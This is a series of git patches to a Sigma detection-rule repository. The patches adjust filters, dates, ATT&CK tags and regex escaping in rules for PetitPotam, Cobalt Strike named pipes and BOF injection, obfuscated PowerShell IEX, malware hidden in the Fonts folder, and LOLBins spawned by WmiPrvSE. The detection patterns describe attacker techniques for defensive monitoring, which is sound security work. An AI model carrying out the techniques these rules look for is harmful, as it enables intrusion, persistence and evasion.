[PATCH 0771/1367] filter: empty thumbprint, PetitPotam rule --- rules/windows/builtin/win_petitpotam_susp_tgt_request.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml b/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml index a576df1b..0ae4cb94 100644 --- a/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml +++ b/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml @@ -9,6 +9,7 @@ description: Detect suspicious Kerberos TGT requests. Once an attacer obtains a to the Domain Controller computer accounts. author: Mauricio Velazco, Michael Haag date: 2021/09/02 +modified: 2021/09/07 references: - https://github.com/topotam/PetitPotam - https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/ @@ -27,7 +28,9 @@ detection: CertThumbprint: '*' filter_local: IpAddress: '::1' - condition: selection and not filter_local + filter_thumbprint: + CertThumbprint: '' + condition: selection and not filter_local and not filter_thumbprint falsepositives: - False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts. level: high From be5351947c3c09db92cb2d5b1ad59ae0e03e3361 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Tue, 7 Sep 2021 16:36:59 +0100 Subject: [PATCH 0772/1367] Unset date update Signed-off-by: Rachel Rice --- rules/cloud/aws/aws_update_login_profile.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_update_login_profile.yml b/rules/cloud/aws/aws_update_login_profile.yml index b4254d07..d8468d6d 100644 --- a/rules/cloud/aws/aws_update_login_profile.yml +++ b/rules/cloud/aws/aws_update_login_profile.yml @@ -5,7 +5,7 @@ description: | An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. With this alert, it is used to detect anyone is changing password on behalf of other users. author: toffeebr33k -date: 2021/09/07 +date: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation logsource: From 4e394d83a1a18a8c291e73bafa881b21134b90a7 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 7 Sep 2021 17:45:41 +0200 Subject: [PATCH 0773/1367] add missing tags --- rules/windows/process_creation/win_apt_mustangpanda.yml | 3 +++ .../win_exchange_proxylogon_oabvirtualdir.yml | 5 ++++- rules/windows/process_creation/win_malware_conti.yml | 3 +++ .../windows/process_creation/win_purplesharp_indicators.yml | 3 +++ rules/windows/process_creation/win_susp_codepage_switch.yml | 3 +++ .../process_creation/win_susp_regedit_trustedinstaller.yml | 3 +++ .../process_creation/win_vul_java_remote_debugging.yml | 3 +++ 7 files changed, 22 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_apt_mustangpanda.yml b/rules/windows/process_creation/win_apt_mustangpanda.yml index 61474510..2ed3d867 100644 --- a/rules/windows/process_creation/win_apt_mustangpanda.yml +++ b/rules/windows/process_creation/win_apt_mustangpanda.yml @@ -32,3 +32,6 @@ fields: falsepositives: - Unlikely level: high +tags: + - attack.t1587.001 + - attack.resource_development \ No newline at end of file diff --git a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml index 96e0ed82..138d45dc 100644 --- a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml +++ b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml @@ -21,4 +21,7 @@ detection: condition: all of selection_cmdlet and selection_params falsepositives: - Unlikely -level: critical \ No newline at end of file +level: critical +tags: + - attack.t1587.001 + - attack.resource_development \ No newline at end of file diff --git a/rules/windows/process_creation/win_malware_conti.yml b/rules/windows/process_creation/win_malware_conti.yml index c529a3ba..1c7671a1 100644 --- a/rules/windows/process_creation/win_malware_conti.yml +++ b/rules/windows/process_creation/win_malware_conti.yml @@ -23,3 +23,6 @@ fields: falsepositives: - Unknown level: high +tags: + - attack.t1587.001 + - attack.resource_development \ No newline at end of file diff --git a/rules/windows/process_creation/win_purplesharp_indicators.yml b/rules/windows/process_creation/win_purplesharp_indicators.yml index 29ae7a7a..1d0969a5 100644 --- a/rules/windows/process_creation/win_purplesharp_indicators.yml +++ b/rules/windows/process_creation/win_purplesharp_indicators.yml @@ -22,3 +22,6 @@ detection: falsepositives: - Unlikely level: critical +tags: + - attack.t1587 + - attack.resource_development \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_codepage_switch.yml b/rules/windows/process_creation/win_susp_codepage_switch.yml index 09f0a787..a6d0a6c2 100644 --- a/rules/windows/process_creation/win_susp_codepage_switch.yml +++ b/rules/windows/process_creation/win_susp_codepage_switch.yml @@ -27,3 +27,6 @@ fields: falsepositives: - "Administrative activity (adjust code pages according to your organisation's region)" level: medium +tags: + - attack.t1036 + - attack.defense_evasion \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_regedit_trustedinstaller.yml b/rules/windows/process_creation/win_susp_regedit_trustedinstaller.yml index f6dc1360..4861f0dc 100644 --- a/rules/windows/process_creation/win_susp_regedit_trustedinstaller.yml +++ b/rules/windows/process_creation/win_susp_regedit_trustedinstaller.yml @@ -18,3 +18,6 @@ detection: falsepositives: - Unlikely level: high +tags: + - attack.privilege_escalation + - attack.t1548 \ No newline at end of file diff --git a/rules/windows/process_creation/win_vul_java_remote_debugging.yml b/rules/windows/process_creation/win_vul_java_remote_debugging.yml index 06b658f9..03448ef3 100644 --- a/rules/windows/process_creation/win_vul_java_remote_debugging.yml +++ b/rules/windows/process_creation/win_vul_java_remote_debugging.yml @@ -20,3 +20,6 @@ fields: falsepositives: - unknown level: medium +tags: + - attack.t1203 + - attack.execution \ No newline at end of file From 4c3f8821c4163782d4395a188ae2b3278d7ecb6e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 7 Sep 2021 18:16:46 +0200 Subject: [PATCH 0774/1367] add missing tags --- rules/linux/auditd/lnx_auditd_susp_exe_folders.yml | 6 ++++-- rules/linux/lnx_buffer_overflows.yml | 3 +++ rules/linux/lnx_clamav.yml | 3 +++ rules/linux/lnx_ldso_preload_injection.yml | 4 ++++ rules/linux/lnx_shell_susp_log_entries.yml | 2 ++ rules/linux/lnx_shellshock.yml | 3 +++ rules/linux/lnx_ssh_cve_2018_15473.yml | 3 +++ rules/linux/lnx_susp_failed_logons_single_source.yml | 3 +++ rules/linux/lnx_susp_guacamole.yml | 4 +++- rules/linux/lnx_symlink_etc_passwd.yml | 3 +++ rules/linux/modsecurity/modsec_mulitple_blocks.yml | 3 +++ 11 files changed, 34 insertions(+), 3 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml b/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml index 4cbc91f8..be388984 100644 --- a/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml +++ b/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml @@ -37,5 +37,7 @@ falsepositives: - Admin activity (especially in /tmp folders) - Crazy web applications level: medium - - +tags: + - attack.t1587 + - attack.t1584 + - attack.resource_development \ No newline at end of file diff --git a/rules/linux/lnx_buffer_overflows.yml b/rules/linux/lnx_buffer_overflows.yml index 7a446e14..fdce5281 100644 --- a/rules/linux/lnx_buffer_overflows.yml +++ b/rules/linux/lnx_buffer_overflows.yml @@ -18,3 +18,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.t1068 + - attack.privilege_escalation \ No newline at end of file diff --git a/rules/linux/lnx_clamav.yml b/rules/linux/lnx_clamav.yml index cd19a25a..852d2dee 100644 --- a/rules/linux/lnx_clamav.yml +++ b/rules/linux/lnx_clamav.yml @@ -20,3 +20,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.resource_development + - attack.t1588.001 \ No newline at end of file diff --git a/rules/linux/lnx_ldso_preload_injection.yml b/rules/linux/lnx_ldso_preload_injection.yml index be1b937b..8f1d0c9c 100644 --- a/rules/linux/lnx_ldso_preload_injection.yml +++ b/rules/linux/lnx_ldso_preload_injection.yml @@ -15,3 +15,7 @@ detection: falsepositives: - rare temporary workaround for library misconfiguration level: high +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1574.006 \ No newline at end of file diff --git a/rules/linux/lnx_shell_susp_log_entries.yml b/rules/linux/lnx_shell_susp_log_entries.yml index 55756eff..053bd8e4 100644 --- a/rules/linux/lnx_shell_susp_log_entries.yml +++ b/rules/linux/lnx_shell_susp_log_entries.yml @@ -16,3 +16,5 @@ detection: falsepositives: - Unknown level: medium +tags: + - attack.impact \ No newline at end of file diff --git a/rules/linux/lnx_shellshock.yml b/rules/linux/lnx_shellshock.yml index ba7fc1bb..f842b16e 100644 --- a/rules/linux/lnx_shellshock.yml +++ b/rules/linux/lnx_shellshock.yml @@ -19,3 +19,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.persistence + - attack.t1505.003 \ No newline at end of file diff --git a/rules/linux/lnx_ssh_cve_2018_15473.yml b/rules/linux/lnx_ssh_cve_2018_15473.yml index a88aa671..d7bb5c46 100644 --- a/rules/linux/lnx_ssh_cve_2018_15473.yml +++ b/rules/linux/lnx_ssh_cve_2018_15473.yml @@ -16,3 +16,6 @@ detection: falsepositives: - Unknown level: medium +tags: + - attack.reconnaissance + - attack.t1589 \ No newline at end of file diff --git a/rules/linux/lnx_susp_failed_logons_single_source.yml b/rules/linux/lnx_susp_failed_logons_single_source.yml index 1d7f4c45..b87fe723 100644 --- a/rules/linux/lnx_susp_failed_logons_single_source.yml +++ b/rules/linux/lnx_susp_failed_logons_single_source.yml @@ -19,3 +19,6 @@ falsepositives: - Jump servers - Workstations with frequently changing users level: medium +tags: + - attack.credential_access + - attack.t1110 \ No newline at end of file diff --git a/rules/linux/lnx_susp_guacamole.yml b/rules/linux/lnx_susp_guacamole.yml index 3e6b7759..a19ec04d 100644 --- a/rules/linux/lnx_susp_guacamole.yml +++ b/rules/linux/lnx_susp_guacamole.yml @@ -16,4 +16,6 @@ detection: falsepositives: - Unknown level: high - +tags: + - attack.credential_access + - attack.t1212 diff --git a/rules/linux/lnx_symlink_etc_passwd.yml b/rules/linux/lnx_symlink_etc_passwd.yml index 9d20a189..043a45b0 100644 --- a/rules/linux/lnx_symlink_etc_passwd.yml +++ b/rules/linux/lnx_symlink_etc_passwd.yml @@ -16,3 +16,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.t1204.001 + - attack.execution \ No newline at end of file diff --git a/rules/linux/modsecurity/modsec_mulitple_blocks.yml b/rules/linux/modsecurity/modsec_mulitple_blocks.yml index aa6461ee..f198cf4c 100644 --- a/rules/linux/modsecurity/modsec_mulitple_blocks.yml +++ b/rules/linux/modsecurity/modsec_mulitple_blocks.yml @@ -18,3 +18,6 @@ falsepositives: - Vulnerability scanners - Frequent attacks if system faces Internet level: medium +tags: + - attack.impact + - attack.t1499 \ No newline at end of file From 143744bc128b8de17f74b7a5c50ccf4a06cb9a5a Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Tue, 7 Sep 2021 23:38:07 +0200 Subject: [PATCH 0775/1367] Various fixes * Backslashes in regular expressions * Casing of condition operators * Further small errors --- rules/network/zeek/zeek_dns_mining_pools.yml | 8 ++-- .../zeek/zeek_dns_suspicious_zbit_flag.yml | 2 +- ...ke_obfuscation_obfuscated_iex_services.yml | 2 +- ...sysmon_suspicious_dbghelp_dbgcore_load.yml | 4 +- .../sysmon_mal_cobaltstrike_re.yml | 38 +++++++++---------- ...hell_invoke_obfuscation_obfuscated_iex.yml | 4 +- ...mon_cobaltstrike_bof_injection_pattern.yml | 4 +- .../win_detecting_fake_instances_of_hxtsr.yml | 2 +- .../win_hiding_malware_in_fonts_folder.yml | 2 +- ...obfuscation_obfuscated_iex_commandline.yml | 4 +- .../win_regedit_import_keys.yml | 2 +- .../win_regedit_import_keys_ads.yml | 2 +- rules/windows/process_creation/win_regini.yml | 2 +- .../process_creation/win_regini_ads.yml | 2 +- ...win_write_protect_for_storage_disabled.yml | 2 +- ...sing_windows_telemetry_for_persistence.yml | 2 +- 16 files changed, 41 insertions(+), 41 deletions(-) diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index c6d11204..7ca14a4f 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -7,9 +7,9 @@ date: 2021/08/19 modified: 2021/08/23 author: Saw Winn Naung, Azure-Sentinel, @neu5ron level: low -logsource: - service: dns - product: zeek +logsource: + service: dns + product: zeek tags: - attack.t1035 # an old one - attack.t1569.002 @@ -93,7 +93,7 @@ detection: - "0.0.0.0" exclude_rejected: rejected: "true" - condition: selection and not (exclude_answers OR exclude_rejected) + condition: selection and not (exclude_answers or exclude_rejected) falsepositives: - A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is "host" and ssl/tls is "server_name". fields: diff --git a/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml b/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml index 1690856f..242a62d9 100644 --- a/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml +++ b/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml @@ -44,7 +44,7 @@ detection: - '137' - '138' - '139' - condition: NOT z_flag_unset AND most_probable_valid_domain AND NOT (exclude_tlds OR exclude_tlds OR exclude_query_types OR exclude_responses OR exclude_netbios) + condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios) falsepositives: - 'Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.' - 'If you work in a Public Sector then it may be good to exclude things like endswith ".edu", ".gov" and or ".mil"' diff --git a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml index aa3cec10..077f3e5c 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml @@ -16,7 +16,7 @@ detection: - ImagePath|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - ImagePath|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' - ImagePath|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' - - ImagePath|re: '\*mdr\*\W\s*\)\.Name' + - ImagePath|re: '\\*mdr\*\W\s*\)\.Name' - ImagePath|re: '\$VerbosePreference\.ToString\(' - ImagePath|re: '\String\]\s*\$VerbosePreference' condition: selection and selection_1 diff --git a/rules/windows/image_load/sysmon_suspicious_dbghelp_dbgcore_load.yml b/rules/windows/image_load/sysmon_suspicious_dbghelp_dbgcore_load.yml index 929ff8cb..68b9041f 100755 --- a/rules/windows/image_load/sysmon_suspicious_dbghelp_dbgcore_load.yml +++ b/rules/windows/image_load/sysmon_suspicious_dbghelp_dbgcore_load.yml @@ -23,7 +23,7 @@ detection: ImageLoaded|endswith: - '\dbghelp.dll' - '\dbgcore.dll' - Image|endswith: + Image|endswith: - '\msbuild.exe' - '\cmd.exe' - '\svchost.exe' @@ -53,7 +53,7 @@ detection: Signed: "FALSE" filter: Image|contains: 'Visual Studio' - condition: (signedprocess AND NOT filter) OR (unsignedprocess AND NOT filter) + condition: (signedprocess and not filter) or (unsignedprocess and not filter) fields: - ComputerName - User diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 1ecc14c6..cc18f34d 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -18,25 +18,25 @@ logsource: definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' detection: selection: - - PipeName|re: '\\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' - - PipeName|re: '\\wkssvc_?[0-9a-f]{2}' - - PipeName|re: '\\ntsvcs[0-9a-f]{2}' - - PipeName|re: '\\DserNamePipe[0-9a-f]{2}' - - PipeName|re: '\\SearchTextHarvester[0-9a-f]{2}' - - PipeName|re: '\\mypipe\-(?:f|h)[0-9a-f]{2}' - - PipeName|re: '\\windows\.update\.manager[0-9a-f]{2,3}' - - PipeName|re: '\\ntsvcs_[0-9a-f]{2}' - - PipeName|re: '\\scerpc_?[0-9a-f]{2}' - - PipeName|re: '\\PGMessagePipe[0-9a-f]{2}' - - PipeName|re: '\\MsFteWds[0-9a-f]{2}' - - PipeName|re: '\\f4c3[0-9a-f]{2}' - - PipeName|re: '\\fullduplex_[0-9a-f]{2}' - - PipeName|re: '\\msrpc_[0-9a-f]{4}' - - PipeName|re: '\\win\\msrpc_[0-9a-f]{2}' - - PipeName|re: '\\f53f[0-9a-f]{2}' - - PipeName|re: '\\rpc_[0-9a-f]{2}' - - PipeName|re: '\\spoolss_[0-9a-f]{2}' - - PipeName|re: '\\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0,' + - PipeName|re: '\\\\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' + - PipeName|re: '\\\\wkssvc_?[0-9a-f]{2}' + - PipeName|re: '\\\\ntsvcs[0-9a-f]{2}' + - PipeName|re: '\\\\DserNamePipe[0-9a-f]{2}' + - PipeName|re: '\\\\SearchTextHarvester[0-9a-f]{2}' + - PipeName|re: '\\\\mypipe\-(?:f|h)[0-9a-f]{2}' + - PipeName|re: '\\\\windows\.update\.manager[0-9a-f]{2,3}' + - PipeName|re: '\\\\ntsvcs_[0-9a-f]{2}' + - PipeName|re: '\\\\scerpc_?[0-9a-f]{2}' + - PipeName|re: '\\\\PGMessagePipe[0-9a-f]{2}' + - PipeName|re: '\\\\MsFteWds[0-9a-f]{2}' + - PipeName|re: '\\\\f4c3[0-9a-f]{2}' + - PipeName|re: '\\\\fullduplex_[0-9a-f]{2}' + - PipeName|re: '\\\\msrpc_[0-9a-f]{4}' + - PipeName|re: '\\\\win\\\\msrpc_[0-9a-f]{2}' + - PipeName|re: '\\\\f53f[0-9a-f]{2}' + - PipeName|re: '\\\\rpc_[0-9a-f]{2}' + - PipeName|re: '\\\\spoolss_[0-9a-f]{2}' + - PipeName|re: '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,' condition: selection falsepositives: - Unknown diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml index 9b030a97..94164d37 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -23,7 +23,7 @@ detection: - ScriptBlockText|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - ScriptBlockText|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' - ScriptBlockText|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' - - ScriptBlockText|re: '\*mdr\*\W\s*\)\.Name' + - ScriptBlockText|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - ScriptBlockText|re: '\$VerbosePreference\.ToString\(' - ScriptBlockText|re: '\String\]\s*\$VerbosePreference' selection_3: @@ -33,7 +33,7 @@ detection: - Payload|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - Payload|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' - Payload|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' - - Payload|re: '\*mdr\*\W\s*\)\.Name' + - Payload|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - Payload|re: '\$VerbosePreference\.ToString\(' - Payload|re: '\String\]\s*\$VerbosePreference' condition: ( selection_1 and selection_2 ) or ( selection_3 and selection_4 ) diff --git a/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml b/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml index de11db2d..7e59e4fb 100644 --- a/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml +++ b/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml @@ -1,5 +1,5 @@ title: CobaltStrike BOF Injection Pattern -id: 09706624-b7f6-455d-9d02-adee024cee1d +id: 09706624-b7f6-455d-9d02-adee024cee1d description: Detects a typical pattern of a CobaltStrike BOF which inject into other processes references: - https://github.com/boku7/injectAmsiBypass @@ -12,7 +12,7 @@ logsource: product: windows detection: selection: - CallTrace|re: '^C:\\Windows\\SYSTEM32\\ntdll\.dll\+[a-z0-9]{4,6}\|C:\\Windows\\System32\\KERNELBASE\.dll\+[a-z0-9]{4,6}\|UNKNOWN\([A-Z0-9]{16}\)$' + CallTrace|re: '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\+[a-z0-9]{4,6}\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\+[a-z0-9]{4,6}\|UNKNOWN\([A-Z0-9]{16}\)$' GrantedAccess: - '0x1028' - '0x1fffff' diff --git a/rules/windows/process_creation/win_detecting_fake_instances_of_hxtsr.yml b/rules/windows/process_creation/win_detecting_fake_instances_of_hxtsr.yml index 1b381614..d5135615 100644 --- a/rules/windows/process_creation/win_detecting_fake_instances_of_hxtsr.yml +++ b/rules/windows/process_creation/win_detecting_fake_instances_of_hxtsr.yml @@ -15,7 +15,7 @@ detection: selection: Image: hxtsr.exe filter: - CurrentDirectory|re: '(?i)c:\\program files\\windowsapps\\microsoft\.windowscommunicationsapps_.*\\hxtsr\.exe' + CurrentDirectory|re: '(?i)c:\\\\program files\\\\windowsapps\\\\microsoft\.windowscommunicationsapps_.*\\\\hxtsr\.exe' condition: selection and not filter falsepositives: - unknown diff --git a/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml b/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml index 6bc345d0..4c44ae87 100644 --- a/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml +++ b/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml @@ -17,7 +17,7 @@ logsource: category: process_creation detection: selection1: - CommandLine|re: '(?i).*(echo|copy|type|file createnew|cacls).*C:\\Windows\\Fonts\\.*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.msh|.reg|.scr|.ps|.vb|.jar|.pl|.inf|.cpl|.hta|.msi|.vbs).*' + CommandLine|re: '(?i).*(echo|copy|type|file createnew|cacls).*C:\\\\Windows\\\\Fonts\\\\.*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.msh|.reg|.scr|.ps|.vb|.jar|.pl|.inf|.cpl|.hta|.msi|.vbs).*' condition: selection1 fields: - CommandLine diff --git a/rules/windows/process_creation/win_invoke_obfuscation_obfuscated_iex_commandline.yml b/rules/windows/process_creation/win_invoke_obfuscation_obfuscated_iex_commandline.yml index cd1a98ae..67ef5719 100644 --- a/rules/windows/process_creation/win_invoke_obfuscation_obfuscated_iex_commandline.yml +++ b/rules/windows/process_creation/win_invoke_obfuscation_obfuscated_iex_commandline.yml @@ -20,9 +20,9 @@ detection: - CommandLine|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - CommandLine|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' - CommandLine|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' - - CommandLine|re: '\*mdr\*\W\s*\)\.Name' + - CommandLine|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - CommandLine|re: '\$VerbosePreference\.ToString\(' - - CommandLine|re: '\String\]\s*\$VerbosePreference' + - CommandLine|re: '\\\\String\]\s*\$VerbosePreference' condition: selection falsepositives: - Unknown diff --git a/rules/windows/process_creation/win_regedit_import_keys.yml b/rules/windows/process_creation/win_regedit_import_keys.yml index 176da7f7..ff27028a 100644 --- a/rules/windows/process_creation/win_regedit_import_keys.yml +++ b/rules/windows/process_creation/win_regedit_import_keys.yml @@ -25,7 +25,7 @@ detection: - ' /a ' - ' /c ' filter_2: - CommandLine|re: ':[^ \\]' # to avoid intersection with ADS rule + CommandLine|re: ':[^ \\\\]' # to avoid intersection with ADS rule condition: selection and not filter and not filter_2 fields: - ParentImage diff --git a/rules/windows/process_creation/win_regedit_import_keys_ads.yml b/rules/windows/process_creation/win_regedit_import_keys_ads.yml index 2d347763..30fac38c 100644 --- a/rules/windows/process_creation/win_regedit_import_keys_ads.yml +++ b/rules/windows/process_creation/win_regedit_import_keys_ads.yml @@ -20,7 +20,7 @@ detection: - ' /i ' - '.reg' selection_2: - CommandLine|re: ':[^ \\]' + CommandLine|re: ':[^ \\\\]' filter: CommandLine|contains: - ' /e ' diff --git a/rules/windows/process_creation/win_regini.yml b/rules/windows/process_creation/win_regini.yml index 3f1a340c..3c85a778 100644 --- a/rules/windows/process_creation/win_regini.yml +++ b/rules/windows/process_creation/win_regini.yml @@ -19,7 +19,7 @@ detection: selection: Image|endswith: '\regini.exe' filter: - CommandLine|re: ':[^ \\]' # to avoid intersection with ADS rule + CommandLine|re: ':[^ \\\\]' # to avoid intersection with ADS rule condition: selection and not filter fields: - ParentImage diff --git a/rules/windows/process_creation/win_regini_ads.yml b/rules/windows/process_creation/win_regini_ads.yml index 9844421c..3673e52b 100644 --- a/rules/windows/process_creation/win_regini_ads.yml +++ b/rules/windows/process_creation/win_regini_ads.yml @@ -18,7 +18,7 @@ logsource: detection: selection: Image|endswith: '\regini.exe' - CommandLine|re: ':[^ \\]' + CommandLine|re: ':[^ \\\\]' condition: selection fields: - ParentImage diff --git a/rules/windows/process_creation/win_write_protect_for_storage_disabled.yml b/rules/windows/process_creation/win_write_protect_for_storage_disabled.yml index 4462da4e..68cbe07d 100644 --- a/rules/windows/process_creation/win_write_protect_for_storage_disabled.yml +++ b/rules/windows/process_creation/win_write_protect_for_storage_disabled.yml @@ -13,7 +13,7 @@ logsource: category: process_creation detection: selection: - CommandLine|re: '(?i).*reg add.*hklm\\system\\currentcontrolset\\control.*(storage|storagedevicepolicies).*write protection.*0.*' + CommandLine|re: '(?i).*reg add.*hklm\\\\system\\\\currentcontrolset\\\\control.*(storage|storagedevicepolicies).*write protection.*0.*' condition: selection falsepositives: - none observed diff --git a/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml b/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml index 48ba2bf0..470b8f10 100644 --- a/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml +++ b/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml @@ -38,5 +38,5 @@ logsource: category: process_creation detection: selection: - CommandLine|re: '(?i).*schtasks.*(-|\/)r.*\\Application Experience\\Microsoft Compatibility Appraiser.*' + CommandLine|re: '(?i).*schtasks.*(-|\/)r.*\\\\Application Experience\\\\Microsoft Compatibility Appraiser.*' condition: selection \ No newline at end of file From f0f3ecfe2f1225f18050dc905e22bb9d2fd5c001 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:00:35 -0600 Subject: [PATCH 0776/1367] Converted to LF Removed : unnecessary event ID --- ...cess_creations_with_Wmiprvse_parent_process.yml | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index f567b8d6..1301950c 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -11,27 +11,23 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/23/8 +Date: 2021/08/23 logsource: product: Windows - service: security category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - EventLog: security - EventID: 4688 - selection2: - NewProcessName|endswith: + Image|endswith: - 'regsvr32' - 'rundll32' - 'msiexec' - 'mshta' - 'verclsid' - selection3: - ParentProcessName|endswith: + selection2: + ParentImage|endswith: - "\\wbem\\WmiPrvSE.exe" - condition: selection1 AND selection2 AND selection3 + condition: selection1 AND selection2 falsepositives: - Unknown level: high From 8467d5a65ae656978d6392f9ebda9604c7e4be29 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 7 Sep 2021 21:09:07 -0600 Subject: [PATCH 0777/1367] Modified Rule Removed : unnecessary event ID --- ...m_proxy executing_regsvr32_with_payload.yml | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index f4797751..0a3bd7cc 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ 